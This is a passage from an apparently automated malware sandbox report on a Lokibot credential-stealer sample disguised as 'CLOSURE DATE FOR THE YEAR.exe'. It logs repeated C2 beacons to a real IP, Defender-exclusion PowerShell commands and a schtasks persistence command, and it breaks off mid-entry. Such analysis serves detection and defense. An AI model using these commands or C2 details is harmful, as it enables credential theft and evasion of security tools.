                                                                                  Dec 4, 2024 06:53:37.417337894 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:38.846515894 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:38 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  50192.168.2.44989194.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:39.110398054 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:39.230432987 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:40.713646889 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:40 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  51192.168.2.44989694.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:40.970338106 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:41.090316057 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:42.517138004 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:42 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  52192.168.2.44990294.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:42.813740015 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:42.933722019 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:44.404247999 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:44 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  53192.168.2.44990694.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:44.672182083 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:44.792351961 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:46.309767008 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:46 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  54192.168.2.44991294.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:46.585800886 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:46.706490040 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:48.190813065 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:47 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  55192.168.2.44991694.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:48.450506926 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:48.570672989 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:50.049144030 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:49 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  56192.168.2.44992094.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:50.313322067 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:50.433425903 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:51.907574892 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:51 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  57192.168.2.44992594.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:52.171034098 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:52.290981054 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:53.783016920 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:53 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  58192.168.2.44993094.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:54.043678045 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:54.163772106 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:55.529705048 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:55 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  59192.168.2.44993694.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:55.802531004 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:55.922616959 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:57.398612022 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:57 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  60192.168.2.44994194.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:57.656769991 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:57.777455091 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:59.245382071 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:59 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  61192.168.2.44994694.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:59.500483036 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:59.620459080 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:54:01.080385923 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:54:00 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  62192.168.2.44995094.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:54:01.369982958 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:54:01.491744995 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:54:02.961114883 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:54:02 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:00:51:56
                                                                                  Start date:04/12/2024
                                                                                  Path:C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe"
                                                                                  Imagebase:0xb0000
                                                                                  File size:630'792 bytes
                                                                                  MD5 hash:17BF29A93776B4F6BE948802F652E6A9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:00:52:03
                                                                                  Start date:04/12/2024
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe"
                                                                                  Imagebase:0x9a0000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:00:52:03
                                                                                  Start date:04/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:00:52:03
                                                                                  Start date:04/12/2024
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe"
                                                                                  Imagebase:0x9a0000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:00:52:03
                                                                                  Start date:04/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:6
                                                                                  Start time:00:52:03
                                                                                  Start date:04/12/2024
                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp"
                                                                                  Imagebase:0x400000
                                                                                  File size:187'904 bytes
                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:00:52:03
                                                                                  Start date:04/12/2024
